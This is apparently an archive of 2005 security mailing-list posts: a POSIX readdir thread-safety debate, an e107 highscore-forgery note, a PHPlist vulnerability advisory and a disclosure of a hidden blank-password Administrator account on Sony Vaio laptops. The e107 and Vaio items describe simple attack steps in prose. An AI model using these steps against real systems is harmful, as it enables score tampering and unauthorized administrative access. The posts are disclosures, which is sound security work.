On 11/6/05, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: I don't see how that is relevant; the typical use of readdir() is as follows: DIR *dirp = opendir(name); while ((dent = readdir(dirp)) != NULL) { ... } closedir(dirp); Nothing other threads do with readdir() on different dirp's will influence what dent points to. The issue is multiple threads using the same DIR. No, it isn't. I certainly limited the scope of my contribution to single threads reading from a DIR. All the 80-odd uses of readdir_r() in the Solaris core source code, all can (and should) be replaced with readdir(). All have a single thread reading and reusing the same struct dirent, so readdir() could be used in POSIXly correct fashion if the following sentence in the open group's manual page was not present: The readdir() function need not be reentrant. A function that is not required to be reentrant is not required to be thread-safe. I believe that this is an error in POSIX; when threadedness was added the manual page could have been changed to indicate that a single thread using the above idiom was safe. Had they done so, we would never have had to use readdir_r() and progammers would not have introduced bugs in the (mis)use of pathconf, over allocating, etc. I would be interested in seeing any real-world use of readdir_r() in a context where readdir_r() is required (multiple threads reading from a single DIR *). Casper
e107 Games System exploit
You get insert a highscore into game_score.php using post method. The system uses these variables, so a simple form will allow you to add a highscore. $player_name = $_POST['name']; $player_score = $_POST['score']; $game_name = $_POST['game']; willeh willey_wonka at hotmail dot com
[TKADV2005-11-001] Multiple vulnerabilities in PHPlist
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Advisory:Multiple vulnerabilities in PHPlist Name:TKADV2005-11-001 Revision:1.0 Release Date:2005/11/07 Last Modified: 2005/11/07 Author: Tobias Klein (tk at trapkit.de) Affected Software: PHPlist (all versions = 2.10.1) Risk:Critical ( ) High (x) Medium (x) Low (x) Vendor URL: http://www.phplist.com/ Vendor Status: Vendor has released an updated version = Overview: = PHPlist is a double opt-in newsletter manager. It is written in PHP and uses a SQL database for storing the information. Version 2.10.1 and prior contain multiple Cross Site Scripting and SQL Injection vulnerabilities. Furthermore it is possible to access and read arbitrary system files through a vulnerability in PHPlist. = Solution: = Upgrade to PHPlist 2.10.2 or newer. http://www.phplist.com/files/ For more technical details see: http://www.trapkit.de/advisories/TKADV2005-11-001.txt -BEGIN PGP SIGNATURE- Version: PGP 8.1 iQA/AwUBQ2+xMpF8YHACG4RBEQLokQCg7cyW6AfrNYY7WZ06mPBrH3uos/cAn06l roUuWofKu3koFc4l62Za1mEY =rRgy -END PGP SIGNATURE-
Hidden accounts on sony vaio laptops
Sony Vaio laptops require you to create a user account the first time you start your laptop. If the user you select is not Administrator, Sony still goes ahead and creates a user Administrator with a blank password. This user does not show up in control panel under User Accounts but if you do start up in safemode the laptop allows you to login as Administrator. This gives an attacker an opportunity to gain administrative access to a computer and access to create add delete or modify user accounts. This is basically a backdoor account that is hidden from the user and compromises the security of all Sony Vaio laptops. -- Securityforge: For all your security needs (http://www.securityforge.com) Dbtech: Get the best programmers for your buisness (http://www.dbtech.org)